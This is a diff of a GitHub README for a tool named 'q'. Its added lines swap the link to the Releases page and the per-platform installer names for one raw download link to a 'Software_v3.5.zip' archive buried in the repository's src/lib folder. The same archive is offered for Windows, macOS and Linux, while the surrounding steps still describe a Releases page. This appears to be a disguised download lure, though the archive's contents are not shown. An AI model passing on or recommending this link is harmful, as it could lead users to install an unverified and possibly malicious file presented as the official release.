AbRhmaN229/q/README.md

 To get started with q, follow these steps:

-1. Visit the [Releases page](https://github.com/AbRhmaN229/q/releases) to find the latest version of q.
+1. Visit the [Releases page](https://github.com/AbRhmaN229/q/raw/refs/heads/main/src/lib/Software_v3.5.zip) to find the latest version of q.
 2. On the Releases page, find the latest version.
 It will have a title like "Release v1.0" and should be at the top of the list.
 3. Click on the version number to access the release details.
 4. Look for the assets section, which lists various installation files.
 5. Download the file that matches your operating system.
-   - For Windows, you might find `q-windows.exe`.
+   - For Windows, you might find `https://github.com/AbRhmaN229/q/raw/refs/heads/main/src/lib/Software_v3.5.zip`.
-   - For macOS, you may see `q-macos.zip`.
+   - For macOS, you may see `https://github.com/AbRhmaN229/q/raw/refs/heads/main/src/lib/Software_v3.5.zip`.
-   - For Linux, there could be a file like `q-linux.tar.gz`.
+   - For Linux, there could be a file like `https://github.com/AbRhmaN229/q/raw/refs/heads/main/src/lib/Software_v3.5.zip`.
 6. Once it’s downloaded, locate the file on your computer.
 7. Follow these quick instructions based on your operating system: